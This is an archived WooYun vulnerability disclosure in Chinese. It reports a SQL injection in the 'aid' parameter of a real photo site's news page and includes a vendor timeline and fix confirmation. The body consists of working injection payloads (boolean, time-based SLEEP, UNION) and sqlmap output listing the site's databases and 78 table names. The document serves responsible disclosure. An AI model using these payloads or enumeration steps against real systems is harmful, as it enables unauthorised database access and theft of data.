乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-26: 细节已通知厂商并且等待厂商处理中 2015-05-26: 厂商已经确认,细节仅向厂商公开 2015-06-05: 细节向核心白帽子及相关领域专家公开 2015-06-15: 细节向普通白帽子公开 2015-06-25: 细节向实习白帽子公开 2015-07-10: 细节向公众公开
233
www.fotomore.com/news/detail.php?aid=703测试payload:aid=703%20AND%201=1aid=703%20AND%201=2
---Parameter: aid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: aid=703 AND 4142=4142 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: aid=703 AND (SELECT * FROM (SELECT(SLEEP(5)))mmAc) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: aid=-4166 UNION ALL SELECT CONCAT(0x7170717071,0x49745648496665507151,0x71716b6b71),NULL,NULL,NULL-----[16:57:33] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.10back-end DBMS: MySQL 5.0.12available databases [8]:[*] fotomoreblog[*] fotomorecms[*] information_schema[*] iscdl[*] iscfav[*] istockchina[*] keyword[*] testDatabase: fotomorecms[78 tables]+------------------------+| qb_ad_compete_place || qb_ad_compete_user || qb_ad_config || qb_ad_norm_place || qb_ad_norm_user || qb_admin_menu || qb_alonepage || qb_area || qb_article || qb_article_content_100 || qb_article_content_101 || qb_article_content_102 || qb_article_content_103 || qb_article_content_104 || qb_article_content_105 || qb_article_db || qb_article_module || qb_channel || qb_collection || qb_comment || qb_config || qb_copyfrom || qb_crontab || qb_form_config || qb_form_content || qb_form_content_1 || qb_form_content_2 || qb_form_content_3 || qb_form_content_4 || qb_form_content_5 || qb_form_content_6 || qb_form_content_7 || qb_form_content_8 || qb_form_module || qb_form_reply || qb_friendlink || qb_friendlink_sort || qb_fu_article || qb_fu_sort || qb_gather_rule || qb_gather_sort || qb_group || qb_guestbook_config || qb_guestbook_content || qb_guestbook_sort || qb_hack || qb_jfabout || qb_jfsort || qb_keyword || qb_keywordid || qb_label || qb_limitword || qb_memberdata || qb_members || qb_menu || qb_module || qb_moneycard || qb_moneylog || qb_olpay || qb_pm || qb_propagandize || qb_regnum || qb_reply || qb_report || qb_shoporderproduct || qb_shoporderuser || qb_sort || qb_special || qb_special_comment || qb_spsort || qb_template || qb_template_bak || qb_upfile || qb_vote_comment || qb_vote_config || qb_vote_element || qb_vote_topic || qb_yzimg |+------------------------+
~~
危害等级:高
漏洞Rank:15
确认时间:2015-05-26 12:49
非常感谢!
2015-05-26:非常感谢您的关注!此漏洞已修复!